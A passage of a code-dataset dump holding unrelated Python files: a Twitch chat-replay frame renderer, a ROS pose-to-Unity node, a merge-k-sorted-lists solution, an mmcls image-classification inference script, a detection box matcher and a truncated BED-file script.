resource_dicts)\n","sub_path":"tests/unit/altimeter/core/graph/test_graph_set.py","file_name":"test_graph_set.py","file_ext":"py","file_size_in_byte":13364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"121627338","text":"#!/usr/bin/python3\ndef exit_m(message):\n print(message)\n exit(0)\n\ndef ini_options(argv):\n global OPT_C\n global OPT_V\n OPT_C = 0\n OPT_V = 0\n argv = [arg for arg in argv if arg]\n for arg in argv:\n if arg[0] == '-':\n for l in arg[1:]:\n if l == 'v':\n OPT_V = 1\n elif l == 'c':\n OPT_C = 1\n else:\n print(\"unknown option '{:s}'\".format(l))\n return [arg for arg in argv if arg[0] != '-']\n\ndef verbose(message):\n if OPT_V == 1:\n 
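# The graph-set tests above all share one shape: build an RDF graph, run a small SPARQL SELECT
# over it, stringify each result row, and compare against an expected ordered list. The same
# shape on a bare rdflib graph -- altimeter's to_rdf() namespace layout is specific to that
# project, so the namespace and subject URI below are assumptions for illustration only:
from rdflib import Graph, Literal, Namespace, URIRef

NS = Namespace("alti:test-name:")
g = Graph()
g.add((URIRef("urn:res:123"), NS["has-foo"], Literal("goo")))

rows = g.query("select ?p ?o where { ?s ?p ?o } order by ?p ?o")
result_tuples = [(str(p), str(o)) for p, o in rows]
assert result_tuples == [("alti:test-name:has-foo", "goo")]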
print(message)\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"38297733","text":"# only for @dotafeeding's personal use\n\n# Twitch Chat PlayBack\n# - scrolling at 60fps actuated based on time\n# - text movement and size based on sentiment volume\n\n# usage: chatvid.py [filename]\n# Each line of chat is stored like this-> stream$user:message|chatTime\n# This script is queued in batches by \"chathighlightqueue.py\", once the desired clips have been selected in Adobe Premiere.\n\n#known issues: \n#extra large emotes abruptly cut off due to render time optimization of not rendering past 4 emotes\n\n#output: f:/clipchat/[Clip Name]/[Frame Number].png \n\n\n#------\n#Config\n\ntimeMergeDistance = 6.44\t\t\t\ntimeMergeDistance = 99.95\t\t\t\ntimeMergeDistance = 31.95\t\t\t\n\ntimeMergeDistance = 7.44\n\n#smaller merge intervals allow for more granular responses (great for when many events occur within a short space)\n#large intervals are good for totaling response counts across the whole chat (great for when just one or few original thoughts appear in chat)\n\nrightAlign = 1\n#rightAlign = 0\n\n\nmsgLen = 22\nmsgLen = 69\n#maximum length messages allowed\n\n\nbannedphrase = [\"d\",\"albert\",\"notatk\"]#banned keywords\n\n#-------\n\n\nfrom PIL import Image, ImageDraw, ImageFont\nimport numpy, sys,os,time\ntry:\n from os import scandir, walk\nexcept ImportError:\n from scandir import scandir, walk\t\nfrom random import randint\nfrom fuzzywuzzy import fuzz\n\nscrollNeeded = 0\nspeed = 0\ntextHeight = 0\nspeeds=[]\nend = 0\n\npath = 'C:/Drive/Code/emotes'\nemotes = []\nfor entry in os.scandir(path):\n\tentry = entry.name\t\n\temotes.append(entry.split(\".\")[0])\n\t\nargs = sys.argv\n\nfilename = 'f:/clipchat/' + args[1] + '/'\nos.mkdir(filename)#runtime is broken if the directory already exists\n\nwith open(\"g:/clips/\" + args[1]) as chatvid:\n\tchatvid = chatvid.readlines()\nout = [x.strip() for x in chatvid]\n\n\n\nblacklist = [\"http\",\"forsen\",\"ᵃ\",\"ᴇ\",\"۞\",\"⎠\",\"📞\",\"É\",\"╣\",\"tyler\",\"sourpls\",\"admiral\",\"TOLI\",\"\u0001\",\"󀀀\",\"贡\",\"ȓ\",\"񡠎\",\"򬀀\",\"ҏ\"]\n\n\nwith open(\"D:/streamdata/helpers\") as helpers:\n\thelpers = helpers.readlines()\n\nhelpers = [x.strip() for x in helpers]\n\n\nfor x in out:\n\ttry:\n\t\tprint(x)\n\t\tfor y in blacklist:\n\t\t\tif y in x.lower():\n\t\t\t\traise\n\texcept:\n\t\tout.remove(x) #remove non utf-8 lines\n\nmostPop={}\nfor chat in out:\n\ttry:\n\t\tmostPop[chat.split(\":\")[1].split(\"|\")[0]] +=1 \n\texcept:\n\t\tmostPop[chat.split(\":\")[1].split(\"|\")[0]] =1 \nalreadyChecked = []\n\t\nwhile True:\n\tbreaker = 1\n\ttry:\n\t\tfor ch in out:\n\t\t\tif ch not in alreadyChecked:\n\t\t\t\tfor ch2 in out:\n\t\t\t\t\tif ch.split(\":\")[0] == ch2.split(\":\")[0] and fuzz.ratio(ch.split(\":\")[1].split(\"|\")[0].lower(),ch2.split(\":\")[1].split(\"|\")[0].lower()) > 55 and ch != ch2:\n\t\t\t\t\t\tif mostPop[ch.split(\":\")[1].split(\"|\")[0]] > mostPop[ch2.split(\":\")[1].split(\"|\")[0]]:#remove similar message spam from the same user\n\t\t\t\t\t\t\tout.remove(ch2)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tout.remove(ch)\n\t\t\t\t\t\traise\n\t\t\t\talreadyChecked.append(ch)\n\texcept:\n\t\tbreaker = 0\n\t\t\n\t\tpass\n\tif breaker:\n\t\tbreak\nmostPop = {}\n\nprint(\"spam removed\")\n\nfor chat in out:\n\ttry:\n\t\tmostPop[chat.split(\":\")[1].split(\"|\")[0]] +=1 
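# The spam-removal pass in chatReplay.py above compares message pairs from the same user with
# fuzz.ratio and drops the less popular variant once similarity exceeds 55, restarting its scan
# via the raise/except trick each time the list mutates. The dedup rule itself, without the
# restart dance (this sketch keeps the first occurrence rather than the most popular spelling,
# which the script additionally tracks through its mostPop counts):
from fuzzywuzzy import fuzz

def dedupe(messages, threshold=55):
    kept = []
    for msg in messages:
        if all(fuzz.ratio(msg.lower(), other.lower()) <= threshold for other in kept):
            kept.append(msg)
    return kept

assert dedupe(["Pog", "POG", "totally different"]) == ["Pog", "totally different"]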
\n\texcept:\n\t\tmostPop[chat.split(\":\")[1].split(\"|\")[0]] =1 \n\nalreadyChecked = []\n\t\t\t\n\t\t\nwhile True:\n\tbreaker = 1\n\ttry:\n\t\tfor ch in out:\n\t\t\tif ch not in alreadyChecked:\n\t\t\t\tfor ranked in mostPop:\n\t\t\t\t\tif (fuzz.ratio(ch.split(\":\")[1].split(\"|\")[0], ranked) > 83 or fuzz.token_sort_ratio(ch.split(\":\")[1].split(\"|\")[0], ranked) > 95) and mostPop[ranked] > mostPop[ch.split(\":\")[1].split(\"|\")[0]]:\n\t\t\t\t\t\tout.append(( ch.split(\":\")[0] + \":\"+ranked + \"|\" + ch.split(\"|\")[1] )) # rank the most common spellings. change extremely similar messages to use the most common spelling (misspelling correction) \n\t\t\t\t\t\tout.remove(ch)\n\t\t\t\t\t\traise\n\t\t\t\talreadyChecked.append(ch)\n\t\t\t\t\n\texcept:\n\t\tbreaker = 0\n\t\tpass\n\t\t\t\t\n\tif breaker:\n\t\tbreak\nalreadyChecked = []\n\t\t\t\nprint(\"corrections made\")\n\n\n\nwhile True:\n\tbreaker = 1\n\ttry:\n\t\tfor ch in out:\n\t\t\tif ch not in alreadyChecked:\n\t\t\t\tfor ch2 in out:\t\t\t\t\t\t#merge identical messages, while displaying username list ranked by fastest reaction time, and counting unique users saying each unique message\n\t\t\t\t\tif ch.split(\"|\")[0].split(\":\")[1].lower() == ch2.split(\"|\")[0].split(\":\")[1].lower() and float(ch2.split(\"|\")[1]) - float(ch.split(\"|\")[1]) < timeMergeDistance and float(ch2.split(\"|\")[1])-float(ch.split(\"|\")[1]) >= 0 and ch != ch2:\n\t\t\t\t\t\tpopCheck={}\n\t\t\t\t\t\tfor chat in mostPop:\n\t\t\t\t\t\t\tif chat.lower() == ch.split(\":\")[1].split(\"|\")[0].lower():\n\t\t\t\t\t\t\t\tpopCheck[chat] = mostPop[chat]\n\t\t\t\t\t\tphrase = max(popCheck, key=popCheck.get)\n\t\t\t\t\t\thelper = \"\"\n\t\t\t\t\t\thelpSum = 0\n\t\t\t\t\t\tif ch2.split(\":\")[0] in helpers:\n\t\t\t\t\t\t\thelpSum += 1\n\t\t\t\t\t\t\thelper += ch2.split(\":\")[0] +\", \"\n\t\t\t\t\t\tif ch.split(\":\")[0] in helpers:\n\t\t\t\t\t\t\thelpSum += 1\n\t\t\t\t\t\t\thelper += ch.split(\":\")[0] + \", \"\n\t\t\t\t\t\t\t\n\t\t\t\t\t\tif len( (ch.split(\":\")[0] + \", \" +ch2.split(\":\")[0]) ) > 32 or \"+\" in ch.split(\":\")[0] or \"+\" in ch2.split(\":\")[0]:\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\ttotal = ch2.split(\":\")[0].count(\",\")\n\t\t\t\t\t\t\ttotal+= ch.split(\":\")[0].count(\",\")\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\ttotal += int(ch2.split(\":\")[0].split(\"+\")[1])\n\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\tpass\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\ttotal += int(ch.split(\":\")[0].split(\"+\")[1])\n\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\tpass\n\t\t\t\t\t\t\tif \",\" not in ch.split(\":\")[0]:\n\t\t\t\t\t\t\t\ttotal+= 1\n\t\t\t\t\t\t\tif \",\" not in ch2.split(\":\")[0]:\n\t\t\t\t\t\t\t\ttotal+= 1\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\ttotal -= helpSum\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tif \"+\" in ch.split(\":\")[0]:\n\t\t\t\t\t\t\t\tout.append(( helper + ch.split(\"+\")[0] + \"+\" + str(total) + \":\" +phrase + \"|\" + ch.split(\"|\")[1] ))\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tout.append(( helper + ch.split(\":\")[0] + \", +\" + str(total) + \":\" +phrase + \"|\" + ch.split(\"|\")[1] ))\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif ch.split(\":\")[0] in helper and ch2.split(\":\")[0] in helper or (ch.split(\":\")[0] not in helper and ch2.split(\":\")[0] not in helper):\n\t\t\t\t\t\t\t\tout.append(( ch.split(\":\")[0] + \", \" +ch2.split(\":\")[0] +\":\" +phrase + \"|\" + ch.split(\"|\")[1] ))\n\t\t\t\t\t\t\telif ch.split(\":\")[0] in helper:\n\t\t\t\t\t\t\t\tout.append(( helper +ch2.split(\":\")[0] +\":\" +phrase + \"|\" + ch.split(\"|\")[1] 
))\n\t\t\t\t\t\t\telif ch2.split(\":\")[0] in helper:\n\t\t\t\t\t\t\t\tout.append(( helper + ch.split(\":\")[0] +\":\" +phrase + \"|\" + ch.split(\"|\")[1] ))\n\t\t\t\t\t\t\n\t\t\t\t\t\tout.remove(ch)\n\t\t\t\t\t\tout.remove(ch2)\n\t\t\t\t\t\traise\n\t\t\t\t\n\t\t\t\talreadyChecked.append(ch)\n\texcept:\n\t\tbreaker = 0\n\t\tpass\n\tif breaker:\n\t\tbreak\n\t\n\t\ncount = 0\nframeskip = 0\nchat = {}\nfor ch in out:\n\tif len(ch.split(\"|\")[0].split(\":\")[1]) < 35:\n\t\tdoit = 1\n\t\tfor x in ch.split(\"|\")[0].split(\":\")[1].split(\" \"):\n\t\t\tif x.lower() in bannedphrase:\n\t\t\t\tdoit = 0\n\t\tif ch.split(\"|\")[0].split(\":\")[1].lower() in bannedphrase:\n\t\t\tdoit = 0\n\t\tif doit:\n\t\t\ttry:\n\t\t\t\tchat[ch.split(\"|\")[0].split(\"$\")[1]] = float(ch.split(\"|\")[1])\n\t\t\texcept:\n\t\t\t\tchat[ch.split(\"|\")[0]] = float(ch.split(\"|\")[1])\n\ncurrentLines = {}\ncLcount = 0\ninterval = 0.322\nchatTime = chat[min(chat,key=chat.get)] - interval+1\ncolor = (0,0,0)\ncolorKey = \"#00ff00\"\ncolorLota = (255,255,255)\ncolorLotaBlue = (0,255,255)\nheight = int(1400/700 * 900)\nW = 1400\nH = int(1400/700 * 45)\n\nshakeCooldown = {}\nsize = int(W / 700 * 35)\nfont = ImageFont.truetype('D:/streamdata/DINPro-Medium.otf', size)\nemoteSize = int(W / 700 * 35)\n\npauselen = 45\npausedFrames = 0\nwhile len(chat) > 0 or scrollNeeded > 20 or end < 40:\n\tchatTime += 1/60\n\t\n\ttry:\n\t\t\n\t\tif chat[min(chat,key=chat.get)] - chatTime < interval:\n\t\t\tcurrentLines[cLcount] = (min(chat,key=chat.get).split(\":\")[0],min(chat,key=chat.get).split(\":\")[1])\n\t\t\tshakeCooldown[cLcount] = 0\n\t\t\tcLcount +=1\n\t\t\tchat.pop(min(chat,key=chat.get))\n\t\t\ttextHeight += H\n\t\t\tscrollNeeded += H\n\texcept:\n\t\ttry:\n\t\t\tchat.pop(min(chat,key=chat.get))\n\t\texcept:\n\t\t\tpass\n\t\tpass\n\t\n\twhile height< -80:\n\t\theight = height + H\n\t\tcurrentLines.pop(min(currentLines))\n\t\n\t\n\ttext = Image.new(\"RGBA\",(W,textHeight+H))\n\tdraw = ImageDraw.Draw(text)\n\t\n\tframeHeight = 0\n\t\n\n\tboostonce = 1\n\tdraw13 = 0\n\tfor line in currentLines:\n\t\tif draw13 < 25:\n\t\t\toutUser = currentLines[line][0]\n\t\t\toutMsg = currentLines[line][1]\n\t\t\t\n\t\t\twords = {}\n\t\t\t\n\t\t\torder = -1\n\t\t\tfor word in outMsg.split(\" \"):\n\t\t\t\torder += 1\n\t\t\t\tw,h = draw.textsize(word, font=font)\n\t\t\t\tif word.lower() in emotes:\n\t\t\t\t\tw = emoteSize\n\t\t\t\t\th = emoteSize\n\t\t\t\twords[order] = [word, w]\n\t\t\ttotalWidth = 0\n\t\t\t\n\t\t\tspacing = W/700 *8\n\t\t\t\n\t\t\twhile order !=-1:\n\t\t\t\ttotalWidth += words[order][1]\n\t\t\t\ttotalWidth += spacing\n\t\t\t\torder -=1\n\t\t\twidthsofar = 0\n\t\t\torder = 0\n\t\t\t\n\t\t\tintensity = 0\n\t\t\t\n\t\t\tif \"+\" in outUser:\n\t\t\t\tintensity = int(outUser.split(\"+\")[1])\n\t\t\t\tcooldown = 1\n\t\t\t\t\n\t\t\t\tif intensity < 5 and shakeCooldown[line]>7:\n\t\t\t\t\tshake = 1\n\t\t\t\telif intensity < 10 and shakeCooldown[line]>5:\n\t\t\t\t\tshake = 2\n\t\t\t\telif intensity < 25 and shakeCooldown[line]>3:\n\t\t\t\t\tshake = 3\n\t\t\t\telif intensity < 50 and shakeCooldown[line]>2:\n\t\t\t\t\tshake = 4\n\t\t\t\telif intensity < 100 and shakeCooldown[line]>1:\n\t\t\t\t\tshake = 5\n\t\t\t\telif intensity > 100:\n\t\t\t\t\tshake = 6\n\t\t\t\telse:\n\t\t\t\t\tcooldown =0\n\t\t\t\t\t\n\t\t\t\tif cooldown:\n\t\t\t\t\tshakeH = shake / randint(1,2)\n\t\t\t\t\tif randint(0,1):\n\t\t\t\t\t\tshakeH *= -1\n\t\t\t\t\t\t\n\t\t\t\t\tshakeW = shake / randint(1,2)\n\t\t\t\t\tif randint(0,1):\n\t\t\t\t\t\tshakeW *= 
-1\n\t\t\t\t\t\n\t\t\t\t\tx = randint(0,1)\n\t\t\t\telse:\n\t\t\t\t\tshakeW = 0\n\t\t\t\t\tshakeH = 0\n\t\t\t\t\n\t\t\t\tshakeCooldown[line] += 1\n\t\t\telse:\n\t\t\t\tshakeW = 0\n\t\t\t\tshakeH = 0\n\t\t\t\n\t\t\twhile order != len(words):\n\t\t\t\tif words[order][0].lower() in emotes:\n\t\t\t\t\temote = 'C:/Drive/Code/emotes/'\n\t\t\t\t\temote += words[order][0].lower()\n\t\t\t\t\temote+= '.png'\n\t\t\t\t\ttry:\n\t\t\t\t\t\temote = Image.open(emote, 'r')\n\t\t\t\t\t\temote = emote.resize((emoteSize+intensity*3,emoteSize+intensity*3) ,Image.LANCZOS)\n\t\t\t\t\t\tif shakeW != 0 and shakeH !=0:\n\t\t\t\t\t\t\temote = emote.rotate(int(randint(-1,1) * (shakeW * shakeH / 3) ), resample=Image.BILINEAR)\n\t\t\t\t\t\ttext.paste(emote,( int( (W-totalWidth) *rightAlign +widthsofar+int(shakeW) -intensity*3) ,0 +frameHeight+int(shakeH)),emote)\n\t\t\t\t\texcept:\n\t\t\t\t\t\tprint(words[order][0].lower() + \" is an invalid emote image\")\n\t\t\t\t\twidthsofar += emoteSize + 5\n\t\t\t\telse:\n\t\t\t\t\n\t\t\t\t\t#crude method of drawing an outer stroke\n\t\t\t\t\tdraw.text( ( ( (((W-totalWidth) * rightAlign )+widthsofar+shakeW-2) ,4-10+frameHeight+shakeH)), words[order][0], font=font, fill=color)\n\t\t\t\t\tdraw.text( ( ( (((W-totalWidth) * rightAlign )+widthsofar+shakeW+2) ,4-10+frameHeight+shakeH)), words[order][0], font=font, fill=color)\n\t\t\t\t\tdraw.text( ( ( (((W-totalWidth) * rightAlign )+widthsofar+shakeW) ,4-10+frameHeight+shakeH)), words[order][0], font=font, fill=color)\n\t\t\t\t\tdraw.text( ( ( (((W-totalWidth) * rightAlign )+widthsofar+shakeW) ,4-10+frameHeight+shakeH)), words[order][0], font=font, fill=color)\n\t\t\t\t\tdraw.text( ( ( (((W-totalWidth) * rightAlign )+widthsofar+shakeW-1) ,4-1-10+frameHeight+shakeH)), words[order][0], font=font, fill=color)\n\t\t\t\t\tdraw.text( ( ( (((W-totalWidth) * rightAlign )+widthsofar+shakeW+1) ,4-1-10+frameHeight+shakeH)), words[order][0], font=font, fill=color)\n\t\t\t\t\tdraw.text( ( ( (((W-totalWidth) * rightAlign )+widthsofar+shakeW) ,4-2-10+frameHeight+shakeH)), words[order][0], font=font, fill=color)\n\t\t\t\t\tdraw.text( ( ( (((W-totalWidth) * rightAlign )+widthsofar+shakeW) ,4-2-10+frameHeight+shakeH)), words[order][0], font=font, fill=color)\n\t\t\t\t\tdraw.text( ( ( (((W-totalWidth) * rightAlign )+widthsofar+shakeW+1) ,4+1-10+frameHeight+shakeH)), words[order][0], font=font, fill=color)\n\t\t\t\t\tdraw.text( ( ( (((W-totalWidth) * rightAlign )+widthsofar+shakeW-1) ,4+1-10+frameHeight+shakeH)), words[order][0], font=font, fill=color)\n\t\t\t\t\tdraw.text( ( ( (((W-totalWidth) * rightAlign )+widthsofar+shakeW) ,4+2-10+frameHeight+shakeH)), words[order][0], font=font, fill=color)\n\t\t\t\t\tdraw.text( ( ( (((W-totalWidth) * rightAlign )+widthsofar+shakeW) ,4+2-10+frameHeight+shakeH)), words[order][0], font=font, fill=color)\n\t\t\t\t\t\n\t\t\t\t\tdraw.text( ( ( (((W-totalWidth) * rightAlign )+widthsofar+shakeW) ,4-10+frameHeight+shakeH)), words[order][0], font=font, fill=colorLota )\n\t\t\t\t\t\n\t\t\t\t\twidthsofar += words[order][1]\n\t\t\t\t\ttry:\n\t\t\t\t\t\tif words[order+1][1] not in emotes:\n\t\t\t\t\t\t\twidthsofar += spacing\n\t\t\t\t\texcept:\n\t\t\t\t\t\tpass\n\t\t\t\torder += 1\n\t\t\tif scrollNeeded > 2000 and height < 0 and boostonce:\n\t\t\t\tboostonce = 0\n\t\t\t\tdraw13 += 25\n\t\t\t\t\n\t\t\tframeHeight += H\n\t\t\t\n\t\t\t\n\tif scrollNeeded > 150:#speed changes on a curve\n\t\tspeed = scrollNeeded/35\n\telif scrollNeeded > 90:\n\t\tspeed = scrollNeeded / 25\n\telif scrollNeeded > 0:\n\t\tspeed = scrollNeeded / 
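# The stanza above fakes an outer text stroke by re-drawing each word a dozen times at small
# pixel offsets. Pillow 6.2+ supports this natively through the stroke_width / stroke_fill
# arguments of ImageDraw.text, which collapses the whole block into a single call:
from PIL import Image, ImageDraw, ImageFont

canvas = Image.new("RGBA", (400, 60))
pen = ImageDraw.Draw(canvas)
fnt = ImageFont.truetype('D:/streamdata/DINPro-Medium.otf', 35)   # same font file as the script
pen.text((10, 5), "example message", font=fnt, fill=(255, 255, 255),
         stroke_width=2, stroke_fill=(0, 0, 0))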
17\n\telse:\n\t\tspeed = 0\n\tif speed > 9:\n\t\tspeed = 9\n\t\t\n\t\t\n\tif pausedFrames == 0:\n\t\tspeeds.append(speed)\n\t\tif len(speeds) > 120:\n\t\t\tspeeds.remove(speeds[0])\n\t\tfSpeed = speed\n\t\t\n\t\tfor speed in speeds:\n\t\t\tfSpeed = (fSpeed * .68) + (speed *.32) \n\t\tspeed = fSpeed\n\t\n\tif scrollNeeded > 2000 and height < 0:\n\t\tspeed = 1000\n\t\n\t\n\tnewFrame = Image.new(\"RGBA\",(W,int(1400/700*1000)))\n\theight -= speed\n\theyight = int(height)\n\tscrollNeeded -= speed\n\tnewFrame.paste(text,(0,heyight))\n\tif len(chat) == 0:\n\t\tend += 1\n\t\n\t\"\"\"\n\tframeskip+=1\n\tif frameskip == 1:\n\t\tframeskip = 0\n\t\"\"\"\n\tcount += 1\n\tnewFrame.save(filename + str(count)+\".png\",\"png\")","sub_path":"chatReplay.py","file_name":"chatReplay.py","file_ext":"py","file_size_in_byte":12744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"397897269","text":"#!/usr/bin/env python\n\n####################################################################\n# Takes geometry_msgs/Pose topic and sets world-frame coordinates of\n# object in unity.\n####################################################################\n\n\nimport rospy\nfrom std_msgs.msg import String\nfrom geometry_msgs.msg import Pose, PoseStamped\n\nfrom tf.transformations import euler_from_quaternion\n\nclass CMDInterface:\n def __init__(self):\n self.pub = rospy.Publisher('unity_cmd', String, queue_size=10)\n self.unity_name = rospy.get_param('~unity_name')\n\n def pose_cb(self, pose_cmd):\n msg = String()\n\n\n euler_angles = euler_from_quaternion((pose_cmd.orientation.x, \\\n pose_cmd.orientation.y, \\\n pose_cmd.orientation.z, \\\n pose_cmd.orientation.w))\n cmd = (pose_cmd.position.x, \\\n pose_cmd.position.y, \\\n pose_cmd.position.z, \\\n euler_angles[0], \\\n euler_angles[1], \\\n euler_angles[2])\n\n msg.data = self.unity_name + ' pose ' + ' '.join(map(str, cmd))\n self.pub.publish(msg)\n\nif __name__ == '__main__':\n try:\n rospy.init_node('pose_to_unity_cmd_node', anonymous=True)\n iface = CMDInterface()\n sub = rospy.Subscriber('pose_cmd', Pose, iface.pose_cb)\n rospy.spin()\n except rospy.ROSInterruptException:\n pass\n","sub_path":"arl_unity_ros_abstract/src/pose_to_unity.py","file_name":"pose_to_unity.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"33660099","text":"import heapq\n\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution(object):\n def mergeKLists(self, lists):\n heap = []\n head = None\n for node in lists:\n if node is not None:\n heapq.heappush(heap,(node.val,node))\n while len(heap) is not 0:\n temp = heapq.heappop(heap)[1]\n if head is None:\n head = temp\n current = head\n else:\n current.next = temp\n current = current.next\n if temp.next is not None:\n heapq.heappush(heap,(temp.next.val,temp.next))\n return head","sub_path":"LeetCode/Algorithms/merge_sorted_lists.py","file_name":"merge_sorted_lists.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"290363010","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/10/3 下午8:35\n# @Author : zxq\n# @File : model_infer.py\n# @Software: PyCharm\nimport json\nimport os\n\nimport cv2\nimport mmcv\nimport numpy as np\nimport torch\nfrom mmcv import Config\n\nfrom mmcls.models import build_classifier\n\nid_to_class = {\n 0: \"normal\",\n 1: 
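# mergeKLists above pushes (node.val, node) tuples onto the heap. Under Python 3 this raises
# TypeError as soon as two values tie, because tuple comparison then falls through to comparing
# ListNode objects, which define no ordering. The usual fix is a monotonically increasing
# counter as a tie-breaker so comparison never reaches the node itself:
import heapq
from itertools import count

def merge_k_lists(lists):
    heap, tie = [], count()
    for node in lists:
        if node is not None:
            heapq.heappush(heap, (node.val, next(tie), node))
    dummy = tail = ListNode(0)            # ListNode as defined in the record above
    while heap:
        _, _, node = heapq.heappop(heap)
        tail.next = tail = node           # append and advance in one statement
        if node.next is not None:
            heapq.heappush(heap, (node.next.val, next(tie), node.next))
    return dummy.next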
\"calling\",\n 2: \"smoking\"\n}\n\nif __name__ == '__main__':\n cfg = Config.fromfile('../../configs/imagenet/ciga_call_cfg.py')\n data_path = '/home/zxq/PycharmProjects/data/ciga_call/test'\n json_file_path = '/home/zxq/PycharmProjects/data/ciga_call/result.json'\n # json1_file_path = '/home/zxq/Downloads/result.json'\n # f = open(json_file_path, mode='r+')\n # content = json.load(f)\n json_file = open(json_file_path, mode='w')\n weight_path = '../../work_dir/version02/epoch_100.pth'\n model = build_classifier(cfg.model)\n model.eval()\n save_path = os.path.join(os.path.dirname(cfg.data.test.data_prefix), 'test_result')\n mmcv.mkdir_or_exist(save_path)\n\n mean_value = None\n std_value = None\n for step_ in cfg.test_pipeline:\n if step_['type'] is 'Normalize':\n mean_value = np.array(step_['mean'])\n std_value = np.array(step_['std'])\n img_name_list = os.listdir(data_path)\n save_json_content = []\n # k = 0\n for img_name in img_name_list:\n img_dir = os.path.join(data_path, img_name)\n print(img_dir)\n img = cv2.imread(img_dir)\n\n # 1, resize\n img_resized = mmcv.imresize(img, (256, 256))\n\n # 2, Normalize\n img_normalized = mmcv.imnormalize(img_resized, mean_value, std_value)\n\n # 3, switch dim and to tensor\n input_data = torch.Tensor(np.transpose(img_normalized, [2, 0, 1]))\n\n # 4, add batch dim\n batch_data = torch.unsqueeze(input_data, 0)\n # 4, infer\n model.load_state_dict(torch.load(weight_path, map_location='cpu')['state_dict'])\n model_output = model(batch_data, return_loss=False)\n output_normalized = torch.nn.functional.softmax(model_output, dim=1)\n output_numpy = output_normalized.detach().numpy()\n cls_output = np.argmax(output_numpy, axis=1)\n print(np.round(output_numpy[0][cls_output[0]], 5))\n\n result_json = {\n \"image_name\": img_name,\n \"category\": id_to_class[cls_output[0]],\n \"score\": np.round(np.float(output_numpy[0][cls_output[0]]), 5)}\n save_json_content.append(result_json)\n # json.dump(result_json, json_file, ensure_ascii=False, indent=4)\n # k += 1\n # if k > 10:\n # break\n\n save_json_content.sort(key=lambda x: int(x['image_name'][:-4]))\n json.dump(save_json_content, json_file, indent=4)\n\n","sub_path":"tools/test_tools/model_infer.py","file_name":"model_infer.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"319850711","text":"import logging\n\nimport torch\nfrom .bbox_helper import bbox_iou_overlaps\nfrom .bbox_helper import bbox_iof_overlaps\n\nlogger = logging.getLogger('global')\n\n\ndef match(bboxes, gt, cfg, gt_ignores=None):\n \"\"\"\n Match roi to gt\n\n Temporarily used tensors:\n overlaps (FloatTensor): [N, M], ious of dt(N) with gt(M)\n ignore_overlaps (FloatTensor): [N, K], ious of dt(N) with ignore regions(K)\n\n Returns:\n target (LongTensor): [N], matched gt index for each roi.\n 1. if a roi is positive, it's target is matched gt index (>=0)\n 2. if a roi is negative, it's target is -1,\n 3. 
if a roi isn't positive nor negative, it's target is -2;\n \"\"\"\n NEGATIVE_TARGET = -1\n IGNORE_TARGET = -2\n N = bboxes.shape[0]\n M = gt.shape[0]\n\n # check M > 0 for no-gt support\n overlaps = bbox_iou_overlaps(bboxes, gt) if M > 0 else bboxes.new_zeros(N, 1)\n ignore_overlaps = None\n if gt_ignores is not None and gt_ignores.numel() > 0:\n ignore_overlaps = bbox_iof_overlaps(bboxes, gt_ignores)\n\n target = bboxes.new_full((N, ), IGNORE_TARGET, dtype=torch.int64)\n dt_to_gt_max, dt_to_gt_argmax = overlaps.max(dim=1)\n\n # rule 1: negative if maxiou < negative_iou_thresh:\n neg_mask = dt_to_gt_max < cfg['negative_iou_thresh']\n target[neg_mask] = NEGATIVE_TARGET\n\n # rule 2: positive if maxiou > pos_iou_thresh\n pos_mask = dt_to_gt_max > cfg['positive_iou_thresh']\n target[pos_mask] = dt_to_gt_argmax[pos_mask]\n\n # rule 3: positive if a dt has highest iou with any gt\n if cfg.get('allow_low_quality_match') and M > 0:\n overlaps = overlaps.t() # IMPORTANT, for faster caculation\n gt_to_dt_max, _ = overlaps.max(dim=1)\n dt_gt_pairs = torch.nonzero((overlaps >= gt_to_dt_max[:, None] - 1e-3))\n if dt_gt_pairs.numel() > 0:\n lqm_dt_inds = dt_gt_pairs[:, 1]\n target[lqm_dt_inds] = dt_to_gt_argmax[lqm_dt_inds]\n pos_mask[lqm_dt_inds] = 1\n\n # rule 4: dt has high iou with ignore regions may not supposed to be negative\n if ignore_overlaps is not None and ignore_overlaps.numel() > 0:\n dt_to_ig_max, _ = ignore_overlaps.max(dim=1)\n ignored_dt_mask = dt_to_ig_max > cfg['ignore_iou_thresh']\n # remove positives from ignored\n ignored_dt_mask = (ignored_dt_mask ^ (ignored_dt_mask & pos_mask))\n target[ignored_dt_mask] = IGNORE_TARGET\n return target\n","sub_path":"unn/models/heads/utils/matcher.py","file_name":"matcher.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"479089601","text":"from base_complement import * \n\n#open genome file and extract window\n\nbedfile = \"glna_cleavage.bed12\" #edit path as needed\nbed = open(bedfile, 'r')\n\nold_cleavage = \"glna_windows.txt\"\nold_sites = open(old_cleavage, 'r')\n\nnew_cleavage = \"glna_windows_newer.txt\"\nnew_sites = open(new_cleavage, 'w')\n\nfor line1 in bed:\n\tfor line2 in old_sites: \n\t\tif '>' in line2:\n\t\t\tnew_sites.write(line2)\n\t\telse: \n\t\t\tif '+' in line1: 